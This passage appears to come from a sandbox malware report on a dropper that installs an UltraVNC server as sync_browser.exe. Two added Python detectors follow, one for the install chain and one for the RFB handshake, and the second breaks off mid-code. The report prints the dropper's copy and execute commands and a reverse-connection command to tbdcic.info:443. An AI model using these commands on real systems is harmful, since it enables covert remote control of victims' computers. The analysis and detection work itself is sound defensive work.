Source: sync_browser.exe, 0000001A.00000002.1500112445.0000000003266000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Windows\system32\svchost.exe -k ICService -pLocalSystemHyper-V Remote Desktop Virtualization Service
Source: sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmicvss
Source: sync_browser.exe, 00000017.00000002.3170525650.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Data Exchange Service
Source: sync_browser.exe, 00000017.00000002.3170525650.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Data Exchange Service
Source: sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Heartbeat Service
Source: sync_browser.exe, 00000017.00000002.3170525650.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 0000001A.00000002.1500112445.0000000003266000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Service Interface
Source: sync_browser.exe, 00000017.00000002.3170134622.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 0000001A.00000002.1499873196.000000000140B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: sync_browser.exe, 0000001A.00000002.1500112445.0000000003266000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V PowerShell Direct Servicek,_
Source: sync_browser.exe, 0000001A.00000002.1500112445.0000000003266000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Guest Service Interface
Source: sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmicheartbeat
Source: C:\Windows\Tasks\sync_browser.exe | API call chain: ExitProcess graph end node | graph_23-21965
Source: C:\Windows\Tasks\sync_browser.exe | API call chain: ExitProcess graph end node
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information queried: ProcessInformation
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E51347E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 23_2_00007FF7E51347E4
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50826B0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,GetLastError,sprintf,OutputDebugStringA,Sleep,FreeLibrary,FreeLibrary | 23_2_00007FF7E50826B0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50D9BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next | 23_2_00007FF7E50D9BC0
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo | 0_2_0040236F
Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E51347E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 23_2_00007FF7E51347E4
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5127220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 23_2_00007FF7E5127220
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E51347E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 26_2_00007FF7E51347E4
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 26_2_00007FF7E5127220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 26_2_00007FF7E5127220
Source: C:\Windows\Tasks\sync_browser.exe | Code function: LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,Process32Next, explorer.exe | 26_2_00007FF7E50D9BC0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5083E20 GetVersionExA,GetModuleFileNameA,GetForegroundWindow,ShellExecuteExA | 23_2_00007FF7E5083E20
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50874C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event | 23_2_00007FF7E50874C0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5094D7E OpenInputDesktop,CloseDesktop,GetTickCount,GetSystemMetrics,GetSystemMetrics,mouse_event,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCursorPos,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,mouse_event,SystemParametersInfoA,SystemParametersInfoA | 23_2_00007FF7E5094D7E
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmd
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
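The process creations above form one install chain: the SFX contents are copied into C:\Windows\Tasks through a relative "..\..\" path (that directory is writable by standard users, so the drop needs no elevation while the binary ends up under the Windows directory), a renamed batch file is run, a decoy PDF is opened in Acrobat while taskkill clears any earlier copy, and C:\Windows\Tasks\sync_browser.exe is then started as an UltraVNC server with -autoreconnect -id:... -connect tbdcic.info:443. The following is an added example and not part of the Joe Sandbox report: a Python detector over constructed Sysmon-style process-creation records (pid, ppid, image, cmdline; the PIDs are invented) that flags each step and correlates them on the parent cmd.exe. Treating 5500 as the default port of the -connect switch is an assumption about UltraVNC's listening-viewer default, not something the report states.

```python
import re
from dataclasses import dataclass
from typing import Optional

TASKS_DIR = "c:\\windows\\tasks"   # dropped into and executed from, per the report
# -connect host[:port] is UltraVNC's reverse-connection switch; 5500 as the default
# listening-viewer port is an assumption about UltraVNC, not stated in the report.
CONNECT_RE = re.compile(r"(?<!\S)-connect\s+([A-Za-z0-9.\-]+)(?::(\d{1,5}))?", re.I)
ID_RE = re.compile(r"(?<!\S)-id:(\S+)", re.I)
AUTORECONNECT_RE = re.compile(r"(?<!\S)-autoreconnect\b", re.I)
TASKKILL_RE = re.compile(r"taskkill\b.*?/im\s+(\S+)", re.I)
CHAIN = {"exec_from_windows_tasks", "vnc_reverse_connect", "taskkill_of_dropped_image"}


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


def norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def parse_vnc_args(cmdline: str) -> Optional[dict]:
    """Extract the reverse-connection target from an UltraVNC server command line."""
    m = CONNECT_RE.search(cmdline)
    if not m:
        return None
    idm = ID_RE.search(cmdline)
    return {
        "host": m.group(1),
        "port": int(m.group(2)) if m.group(2) else 5500,
        "autoreconnect": AUTORECONNECT_RE.search(cmdline) is not None,
        "id": idm.group(1) if idm else None,
    }


def analyse(events: list) -> list:
    findings: list = []
    dropped: dict = {}    # basename of an image run from C:\Windows\Tasks -> pids
    by_parent: dict = {}  # ppid -> rule names fired by its children

    def add(rule: str, ev: dict, detail: str) -> None:
        findings.append(Finding(rule, ev["pid"], detail))
        by_parent.setdefault(ev["ppid"], set()).add(rule)

    for ev in events:
        img, cmd = norm(ev["image"]), ev["cmdline"]
        if img.startswith(TASKS_DIR + "\\"):
            dropped.setdefault(img.rsplit("\\", 1)[-1], []).append(ev["pid"])
            add("exec_from_windows_tasks", ev, ev["image"])
        # The dropper's copy target is the relative "..\..\..\Windows\Tasks\", so the
        # directory is matched anywhere in the command line, not as an absolute prefix.
        if img.endswith("\\cmd.exe") and re.search(r"\bcopy\b", cmd, re.I) and "\\windows\\tasks" in norm(cmd):
            add("copy_into_windows_tasks", ev, cmd)
        vnc = parse_vnc_args(cmd)
        if vnc:
            add("vnc_reverse_connect", ev,
                f"{vnc['host']}:{vnc['port']} autoreconnect={vnc['autoreconnect']} id={vnc['id']}")
    # Second pass: in the log, taskkill of the dropped image precedes its (re)start.
    for ev in events:
        m = TASKKILL_RE.search(ev["cmdline"])
        if m and m.group(1).lower() in dropped:
            add("taskkill_of_dropped_image", ev, m.group(1))
    for ppid, rules in by_parent.items():
        if CHAIN <= rules:  # one parent drove kill + start + reverse connect: the full chain
            findings.append(Finding("ultravnc_install_chain", ppid, ", ".join(sorted(rules))))
    return findings


def summarise(events: list) -> dict:
    """rule name -> sorted pids; the shape an alert (or a test) wants."""
    out: dict = {}
    for f in analyse(events):
        out.setdefault(f.rule, []).append(f.pid)
    return {k: sorted(v) for k, v in out.items()}


# Constructed events modelled on the process tree in the report (PIDs invented).
EVENTS = [dict(zip(("pid", "ppid", "image", "cmdline"), row)) for row in (
    (1240, 900, r"C:\Users\user\Desktop\Olz7TmvkEW.exe", r'"C:\Users\user\Desktop\Olz7TmvkEW.exe"'),
    (1300, 1240, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"'),
    (1310, 1240, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd'),
    (1400, 1310, r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe", r'"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"'),
    (1500, 1310, r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /f /im sync_browser.exe"),
    (2044, 1310, r"C:\Windows\Tasks\sync_browser.exe", r"C:\Windows\Tasks\sync_browser.exe"),
    (1840, 1310, r"C:\Windows\Tasks\sync_browser.exe", r"C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443"),
    (3000, 900, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
)]

if __name__ == "__main__":
    for f in analyse(EVENTS):
        print(f"{f.rule:28} pid={f.pid:<5} {f.detail}")
```

The two-pass design matters: the batch file kills sync_browser.exe before it starts it, so a single forward pass that only knows about dropped images once they execute would miss the taskkill. Correlating on the parent rather than on time also survives the timeout.exe padding between the steps.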
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E5087B90 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetLastError,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA | 23_2_00007FF7E5087B90
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_0040244E AllocateAndInitializeSid,CheckTokenMembership,FreeSid | 0_2_0040244E
Source: GIjul8.QTIrrr.0.dr | Binary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitrestartvncdesktop.cpp : ~vncDesktop
Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: vncmenu.cpp : ########### Shell_TrayWnd found %i
Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: Location: // basicwinhttp.dllWinHttpGetIEProxyConfigForCurrentUser;http=https==UltraVNC.ini -settingshelperWinsta0\DefaultShell_TrayWndpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-57B0D07B8C7C}{34F673E0-878F-11D5-B98A-00B0D07B8C7C}0~
Source: sync_browser.exe, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr | Binary or memory string: Program Manager
Source: sync_browser.exe, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr | Binary or memory string: Shell_TrayWnd
Source: sync_browser.exe, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr | Binary or memory string: Progman
Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: WTSUnRegisterSessionNotificationvncmenu.cpp : ########### Shell_TrayWnd found %i
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar | 0_2_00402187
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_00401815 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z | 0_2_00401815
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E50D9EF0 GetProcessWindowStation,GetUserObjectInformationA,GetLastError,SetLastError,RevertToSelf,GetUserNameA,GetLastError,GetLastError | 23_2_00007FF7E50D9EF0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF7E512DF80 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte | 23_2_00007FF7E512DF80
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe | Code function: 0_2_00405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA | 0_2_00405721

                          Stealing of Sensitive Information

Source: Yara match | File source: 26.0.sync_browser.exe.7ff7e5070000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.sync_browser.exe.7ff7e5070000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.sync_browser.exe.7ff7e5070000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.sync_browser.exe.7ff7e5070000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1299009306.0000000002904000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.1500421713.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1299366156.000000000062B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.1496705820.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000000.1422085476.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Olz7TmvkEW.exe PID: 1240, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sync_browser.exe PID: 2044, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sync_browser.exe PID: 1840, type: MEMORYSTR
Source: Yara match | File source: C:\Windows\Tasks\GIjul8.QTIrrr, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr, type: DROPPED
Source: Yara match | File source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED

                          Remote Access Functionality

Source: Yara match | File source: 26.0.sync_browser.exe.7ff7e5070000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.sync_browser.exe.7ff7e5070000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.sync_browser.exe.7ff7e5070000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.sync_browser.exe.7ff7e5070000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1299009306.0000000002904000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.1500421713.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1299366156.000000000062B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.1496705820.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000000.1422085476.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Olz7TmvkEW.exe PID: 1240, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sync_browser.exe PID: 2044, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sync_browser.exe PID: 1840, type: MEMORYSTR
Source: Yara match | File source: C:\Windows\Tasks\GIjul8.QTIrrr, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr, type: DROPPED
Source: Yara match | File source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED
Source: sync_browser.exe, 00000017.00000002.3170436732.0000000002B10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: RFB 003.008
Source: sync_browser.exe, 00000017.00000003.1611921485.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: RFB 003.008
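"RFB 003.008" is the ProtocolVersion banner of the RFB protocol that VNC implements (RFC 6143). Two details matter for the network side of this sample: the RFB server always speaks first, and in UltraVNC's -connect mode the victim is the server and also the TCP initiator, so on the connection to tbdcic.info:443 the first bytes the victim sends are this banner rather than a TLS ClientHello, which is what a TLS-aware proxy or IDS would expect on that port. The following is an added example and not part of the Joe Sandbox report: a Python parser for the first three handshake messages that recovers the negotiated version, identifies which side is the server (hence whether this is a reverse connection), decodes the security types in both the 3.3 and the 3.7/3.8 encodings, and notes a non-VNC destination port. The flows are constructed; the security-type numbers come from the RFB registry, and 5500 as the reverse-connection listener port is an assumption about UltraVNC defaults.

```python
import re
import struct
from typing import Optional

VERSION_RE = re.compile(rb"^RFB (\d{3})\.(\d{3})\n$")
SECURITY_TYPES = {0: "Invalid", 1: "None", 2: "VNC Authentication",
                  16: "Tight", 17: "Ultra", 18: "TLS", 19: "VeNCrypt"}
# displays :0-:99, plus 5500 as the listening-viewer port (assumption about UltraVNC)
VNC_PORTS = set(range(5900, 6000)) | {5500}


def parse_protocol_version(msg: bytes) -> Optional[tuple]:
    """'RFB xxx.yyy\\n' -> (major, minor); None if the message is not an RFB banner."""
    m = VERSION_RE.match(msg)
    return (int(m.group(1)), int(m.group(2))) if m else None


def parse_security_types(version: tuple, msg: bytes) -> tuple:
    """Server message after both banners -> (offered types, failure reason or None)."""
    if version < (3, 7):
        # 3.3: the server dictates one type as a U32; 0 means the connection failed,
        # followed by a U32 length and a reason string.
        (t,) = struct.unpack("!I", msg[:4])
        if t == 0:
            (n,) = struct.unpack("!I", msg[4:8])
            return [], msg[8:8 + n].decode("latin-1")
        return [t], None
    # 3.7/3.8: U8 count then that many U8 types; count 0 is failure plus reason string.
    n = msg[0]
    if n == 0:
        (ln,) = struct.unpack("!I", msg[1:5])
        return [], msg[5:5 + ln].decode("latin-1")
    return list(msg[1:1 + n]), None


def inspect_flow(messages: list, dst_port: int) -> Optional[dict]:
    """messages: (direction, payload) in wire order, direction 'i>r' (initiator to
    responder) or 'r>i'. Returns None unless the flow starts with an RFB handshake."""
    if len(messages) < 3:
        return None
    (d0, m0), (d1, m1), (d2, m2) = messages[:3]
    sv, cv = parse_protocol_version(m0), parse_protocol_version(m1)
    # RFB: the server sends its banner first, the client answers with the version it
    # will use (never higher), then the server sends the security types.
    if sv is None or cv is None or d0 == d1 or d2 != d0:
        return None
    version = min(sv, cv)
    types, reason = parse_security_types(version, m2)
    server_is_initiator = d0 == "i>r"
    return {
        "version": version,
        "server": "initiator" if server_is_initiator else "responder",
        "reverse_connection": server_is_initiator,  # the desktop is being pushed outbound
        "security_types": [SECURITY_TYPES.get(t, f"unknown({t})") for t in types],
        "failure_reason": reason,
        "nonstandard_port": dst_port not in VNC_PORTS,
    }


# Constructed flows. The first mirrors the report's indicators: the victim initiates
# the TCP connection to port 443 and is the RFB server.
REVERSE_CONNECT_FLOW = [
    ("i>r", b"RFB 003.008\n"),  # victim (sync_browser.exe, an UltraVNC server) speaks first
    ("r>i", b"RFB 003.008\n"),  # operator's listening viewer answers
    ("i>r", b"\x01\x11"),       # one security type offered: 17 = Ultra
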